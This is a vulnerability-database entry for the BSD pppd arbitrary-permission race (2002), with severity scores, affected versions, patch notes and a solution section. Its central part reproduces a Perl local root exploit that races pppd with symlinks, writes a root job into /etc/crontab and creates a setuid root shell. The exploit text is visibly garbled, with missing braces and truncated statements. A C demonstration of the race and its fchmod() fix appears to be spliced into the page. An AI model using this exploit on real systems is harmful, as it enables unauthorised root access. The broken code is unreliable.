Published: 2002-08-12 00:00:00
Revised: 2016-10-17 22:22:12

[Original] BSD pppd allows local users to change the permissions of arbitrary files via a symlink attack on a file that is specified as a tty device.

[CNNVD] Multiple Vendor BSD pppd Arbitrary File Permission Modification Race Condition Vulnerability (CNNVD-200208-093)

A vulnerability exists in BSD pppd. A local user can change the permissions of arbitrary files by placing a symbolic link at the path given as the tty device.

- CVSS (Base Score)

CVSS score: 1.2 [LOW]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: HIGH [exploitation requires specific access conditions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (Affected Platforms and Products)

cpe:/o:freebsd:freebsd:2.1.6   FreeBSD 2.1.6
cpe:/o:freebsd:freebsd:2.1.5   FreeBSD 2.1.5
cpe:/o:freebsd:freebsd:2.2.7   FreeBSD 2.2.7
cpe:/o:freebsd:freebsd:2.2.5   FreeBSD 2.2.5
cpe:/o:freebsd:freebsd:2.2.1   FreeBSD 2.2.1
cpe:/o:freebsd:freebsd:2.2.6   FreeBSD 2.2.6
cpe:/o:freebsd:freebsd:2.1.7   FreeBSD 2.1.7
cpe:/o:freebsd:freebsd:3.0     FreeBSD 3.0
cpe:/o:freebsd:freebsd:3.2     FreeBSD 3.2
cpe:/o:freebsd:freebsd:4.1     FreeBSD 4.1
cpe:/o:freebsd:freebsd:1.1     FreeBSD 1.1
cpe:/o:freebsd:freebsd:2.0     FreeBSD 2.0
cpe:/o:freebsd:freebsd:2.0.5   FreeBSD 2.0.5
cpe:/o:freebsd:freebsd:2.2.2   FreeBSD 2.2.2
cpe:/o:freebsd:freebsd:2.2.8   FreeBSD 2.2.8
cpe:/o:freebsd:freebsd:4.1.1   FreeBSD 4.1.1
cpe:/o:freebsd:freebsd:1.1.5   FreeBSD 1.1.5
cpe:/a:samba:ppp               Samba ppp
cpe:/o:freebsd:freebsd:2.2     FreeBSD 2.2
cpe:/o:freebsd:freebsd:3.1     FreeBSD 3.1
cpe:/o:freebsd:freebsd:4.0     FreeBSD 4.0
cpe:/o:freebsd:freebsd:1.0     FreeBSD 1.0
cpe:/o:freebsd:freebsd:3.4     FreeBSD 3.4
cpe:/o:freebsd:freebsd:4.3     FreeBSD 4.3
cpe:/o:freebsd:freebsd:4.5     FreeBSD 4.5
cpe:/o:freebsd:freebsd:2.1.0   FreeBSD 2.1.0
cpe:/o:freebsd:freebsd:3.3     FreeBSD 3.3
cpe:/o:freebsd:freebsd:4.2     FreeBSD 4.2
cpe:/o:freebsd:freebsd:3.5     FreeBSD 3.5
cpe:/o:freebsd:freebsd:4.4     FreeBSD 4.4

- OVAL (Technical Details for Detection)


- Official Database Links
(official data source) MITRE
(official data source) NVD
(official data source) CNNVD

- Other Links and Resources
(UNKNOWN)  FREEBSD  FreeBSD-SA-02:32.pppd
(UNKNOWN)  XF  pppd-race-condition(9738)
(UNKNOWN)  OPENBSD  20020729 011: SECURITY FIX: July 29, 2002
(UNKNOWN)  BID  5355

- Vulnerability Information

Multiple Vendor BSD pppd Arbitrary File Permission Modification Race Condition Vulnerability
Low severity  Race condition
2002-08-12 00:00:00  2005-09-14 00:00:00
A vulnerability exists in BSD pppd. A local user can change the permissions of arbitrary files by placing a symbolic link at the path given as the tty device.

- Advisories and Patches

        NetBSD has reissued their advisory. Users are strongly urged to upgrade systems to NetBSD 1.6 which is not vulnerable to this issue. Further details are available in the referenced advisory.
        Patches are available:
        OpenBSD OpenBSD 3.1
        OpenBSD OpenBSD 3.0
        FreeBSD FreeBSD 4.4
        FreeBSD FreeBSD 4.4 -STABLE
        FreeBSD FreeBSD 4.4 -RELENG
        FreeBSD FreeBSD 4.5 -STABLE
        FreeBSD FreeBSD 4.5
        FreeBSD FreeBSD 4.5 -RELEASE
        FreeBSD FreeBSD 4.6
        FreeBSD FreeBSD 4.6 -RELEASE
        FreeBSD FreeBSD 4.6 -STABLE

- Vulnerability Information (21669)

FreeBSD 4.x,NetBSD 1.4.x/1.5.x/1.6,OpenBSD 3 pppd Arbitrary File Permission Modification Race Condition (EDBID:21669)
bsd local
2002-07-29 Verified
0 Sebastian Krahmer
N/A [click to download]

A vulnerability has been reported in some versions of the pppd daemon included with multiple BSD distributions.

A race condition error in the code may result in the pppd process changing the file permissions on an arbitrary system file. pppd will generally run as a privileged user.

This issue has been reported in OpenBSD versions 3.0 and 3.1. Earlier versions of OpenBSD may share this vulnerability; however, this has not been confirmed.


# Local root exploit for AnyBSD. Tested on my 4.3 FBSD homebox.
# (C) 2002 Sebastian Krahmer -- stealth at segfault dot net ;-))
# NOT for abuse but for educational purposes only.
# Exploit description:
# The BSD pppd allows users to open any file even if it's root owned.
# It then tries to set appropriate terminal attributes on the filedescriptor
# if a connection-script is given. As if it isn't bad enough that it allows
# you to open root's console for example it also has a race: If the tcgetattr()
# fails it calls some cleanup routines which use chown() to restore the mode
# of the terminal (at least it ASSUMES it is a terminal). It should rather use
# the tty_fd to restore the mode because between open() and tcgetattr failure+chown()
# we link the file to /etc/crontab which will then have the mode of the former file
# (which is probably 0666 :)

# Some code snippets.
# The vulnerable open():
# ...
#        /*
#         * Open the serial device and set it up to be the ppp interface.
#         * First we open it in non-blocking mode so we can set the
#         * various termios flags appropriately.  If we aren't dialling
#         * out and we want to use the modem lines, we reopen it later
#         * in order to wait for the carrier detect signal from the modem.
#         */
#       while ((ttyfd = open(devnam, O_NONBLOCK | O_RDWR, 0)) < 0) {
#            if (errno != EINTR)
#                syslog(LOG_ERR, "Failed to open %s: %m", devnam);
#            if (!persist || errno != EINTR)
#                goto fail;
#       }
# ...
# close_tty() which is called during cleanup because tcgetattr() of
# the fd will fail:
# static void
# close_tty()
# {
#    disestablish_ppp(ttyfd);
#   /* drop dtr to hang up */
#    if (modem) {
#        setdtr(ttyfd, FALSE);
#        /*
#         * This sleep is in case the serial port has CLOCAL set by default,
#         * and consequently will reassert DTR when we close the device.
#         */
#        sleep(1);
#    }
#    restore_tty(ttyfd);
#    if (tty_mode != (mode_t) -1)
#        chmod(devnam, tty_mode);
#    close(ttyfd);
#    ttyfd = -1;
# }
# The chmod() bangs.
# Fix suggestion: use fchmod() instead of chmod() and do not allow
# users to open root owned files.

# ok, standard init ...
umask 0;

system("cp /etc/crontab /tmp/crontab");

# create evil .ppprc to catch right execution path in pppd
open O, ">.ppprc" or die $!;
print O "/dev/../tmp/ppp-device\n".
        "connect /tmp/none\n";

close O;

print "Starting ... You can safely ignore any error messages and lay back. It can take some\n".

# create a boomsh to be made +s
# fork off a proc which constantly creates a mode 0666
# file and a link to /etc/crontab. crontab file will "inherit"
# the mode then
if (fork() == 0) {

# fork off own proc which inserts command into crontab file
# which is then executed as root
if (fork() == 0) {

my $child;

# start pppd until race succeeds!
for (;;) {
	if (($child = fork()) == 0) {
		exec ("/usr/sbin/pppd");

	last if (((stat("/tmp/boomsh"))[2] & 04000) == 04000);

# ok, we have a lot of interpreters running due to fork()'s
# so kill them...
if (fork() == 0) {
	system("killall -9 perl");

# thats all folks! ;-)


sub create_boomsh
	open O, ">/tmp/boomsh.c" or die $!;
	print O "int main() { char *a[]={\"/bin/sh\", 0}; setuid(0); ".
	        "system(\"cp /tmp/crontab /etc/crontab\"); execve(*a,a,0); return 1;}\n";
	close O;
	system("cc /tmp/boomsh.c -o /tmp/boomsh");

sub play_tricks
	my $file = shift;
	for (;;) {
		open O, ">$file";
		close O;

		# On the OpenBSD box of a friend 0.01 as fixed value
		# did the trick. on my FreeBSD box 0.1 did.
		# maybe you need to play here
		select undef, undef, undef, rand 0.3;
		symlink("/etc/crontab", $file);

sub watch_crontab
	for (;;) {
		open O, ">>/etc/crontab" or next;
		print "Race succeeded! Waiting for cron ...\n";
		print O "\n* * * * * root chown root /tmp/boomsh;chmod 04755 /tmp/boomsh\n"; 
		close O;


- Vulnerability Information

Multiple BSD pppd Race Condition Arbitrary File Permission Modification
Local Access Required Race Condition
Loss of Integrity
Exploit Public

- Vulnerability Description

Multiple BSD OSs contain a flaw that may allow a malicious local user to manipulate arbitrary files on the system. The issue is due to pppd changing the permissions of arbitrary files via a symlink attack on a file that is specified as a tty device, resulting in a loss of integrity.
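As an added illustration of the path-versus-descriptor problem described above (this is not pppd's code and not the exploit author's; the function names, the scratch-directory layout and the two constructed files are assumptions), the following C program reproduces the race on its own temporary files: it records the mode of an opened "device" file, swaps the path for a symlink to a second "victim" file, and then restores the mode once by path, as pppd's close_tty() did with chmod(devnam, tty_mode), and once on the open descriptor with fchmod(), the fix the exploit header suggests. It also includes the fstat()/isatty() check that refuses a regular file posing as a tty.

```c
/* Added example (not pppd's own code): restoring a tty's mode by path versus
 * by descriptor, and checking that an opened "device" really is a terminal.
 * All function names and the scratch files are assumptions for this demo. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern: the mode is applied to whatever the path names *now*.
 * If the path has been replaced by a symlink since open(), the link target
 * receives tty_mode instead of the device that was opened. */
int restore_mode_by_path(const char *devnam, mode_t tty_mode)
{
    return chmod(devnam, tty_mode);
}

/* Fixed pattern: the mode is applied to the object the descriptor refers
 * to, i.e. the file that was actually opened, regardless of the path. */
int restore_mode_by_fd(int ttyfd, mode_t tty_mode)
{
    return fchmod(ttyfd, tty_mode);
}

/* Second half of the fix: after open(), confirm the descriptor is a terminal
 * before touching its attributes or mode. Returns 1 for a character device
 * that isatty() accepts, 0 for anything else (including a bad fd). */
int check_is_tty(int fd)
{
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISCHR(st.st_mode))
        return 0;
    return isatty(fd) ? 1 : 0;
}

/* Reproduce the race on constructed files in a fresh temp directory.
 * Writes the victim's mode after the by-path restore, the victim's mode
 * after the by-fd restore, and the opened device's mode after the by-fd
 * restore. Returns 0 on success, -1 on a setup failure. */
int simulate_race(mode_t *path_victim, mode_t *fd_victim, mode_t *fd_device)
{
    char dir[] = "/tmp/pppd-race-XXXXXX";
    char device[64], victim[64];
    struct stat st;
    int d0, vfd, ttyfd;
    mode_t tty_mode;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(device, sizeof device, "%s/device", dir);
    snprintf(victim, sizeof victim, "%s/victim", dir);

    /* Constructed stand-ins: a world-writable "device" and a 0600 "victim". */
    d0 = open(device, O_CREAT | O_RDWR, 0600);
    vfd = open(victim, O_CREAT | O_RDWR, 0600);
    if (d0 < 0 || vfd < 0)
        return -1;
    if (fchmod(d0, 0666) != 0 || fchmod(vfd, 0600) != 0)
        return -1;
    close(d0);
    close(vfd);

    /* pppd side: open the named device and remember its mode. */
    ttyfd = open(device, O_NONBLOCK | O_RDWR, 0);
    if (ttyfd < 0 || fstat(ttyfd, &st) != 0)
        return -1;
    tty_mode = st.st_mode & 07777;            /* 0666 here */

    /* Race window: the path is swapped for a symlink to the victim. */
    unlink(device);
    if (symlink(victim, device) != 0)
        return -1;

    /* Vulnerable restore follows the symlink: the victim becomes 0666. */
    restore_mode_by_path(device, tty_mode);
    if (stat(victim, &st) != 0)
        return -1;
    *path_victim = st.st_mode & 07777;

    /* Reset the victim, then restore through the descriptor instead:
     * the victim keeps 0600 and the original device file gets 0666. */
    if (chmod(victim, 0600) != 0)
        return -1;
    restore_mode_by_fd(ttyfd, tty_mode);
    if (stat(victim, &st) != 0)
        return -1;
    *fd_victim = st.st_mode & 07777;
    if (fstat(ttyfd, &st) != 0)
        return -1;
    *fd_device = st.st_mode & 07777;

    close(ttyfd);
    unlink(device);
    unlink(victim);
    rmdir(dir);
    return 0;
}

int main(void)
{
    mode_t pv, fv, fd;
    if (simulate_race(&pv, &fv, &fd) != 0) {
        perror("simulate_race");
        return 1;
    }
    printf("chmod(path): victim mode %04o (inherited the device's mode)\n", pv);
    printf("fchmod(fd):  victim mode %04o, device mode %04o\n", fv, fd);
    return 0;
}
```

The program needs a writable /tmp and nothing else. The descriptor-based restore is correct even though the device path was unlinked during the window, because the open descriptor pins the original inode; that is exactly the property the path-based chmod() in close_tty() lacked.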

- Timeline

2002-07-29 Unknown
2002-07-29 Unknown

- Solution

Upgrade to FreeBSD version 4.6-STABLE; or to the RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated after the correction date (4.6.1-RELEASE-p2, 4.5-RELEASE-p11, or 4.4-RELEASE-p18) or higher, as it has been reported to fix this vulnerability. In addition, FreeBSD has released a patch for some older versions. Upgrade to OpenBSD version 3.1 dated after the correction date or higher, as it has been reported to fix this vulnerability. In addition, OpenBSD has released a patch for some older versions. Upgrade to NetBSD version 1.6 dated after the correction date or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: remove the setuid bit from pppd. However, this will likely affect required functionality.

- Related References

- Vulnerability Author